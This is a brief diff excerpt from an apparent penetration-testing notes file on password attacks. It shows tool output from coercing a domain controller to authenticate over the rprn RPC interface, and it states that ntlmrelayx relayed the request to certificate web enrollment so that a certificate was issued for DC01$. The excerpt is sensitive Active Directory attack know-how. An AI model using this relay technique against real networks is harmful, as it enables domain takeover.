Roothulhu/Pwnomicon/docs/07-password-attacks.md

 # [*] Attempting to trigger authentication via rprn RPC at <DC01_IP>
 # [*] Bind OK
 # [*] Got handle
-# RPRN SessionError: code: 0x6ba - RPC_S_SERVER_UNAVAILABLE - The RPC server is unavailable.
-# [*] Triggered RPC backconnect, this may or may not have worked
 ```

 Referring back to `ntlmrelayx`, we can see from the output that the authentication request was successfully relayed to the web enrollment application, and a certificate was issued for **DC01$**: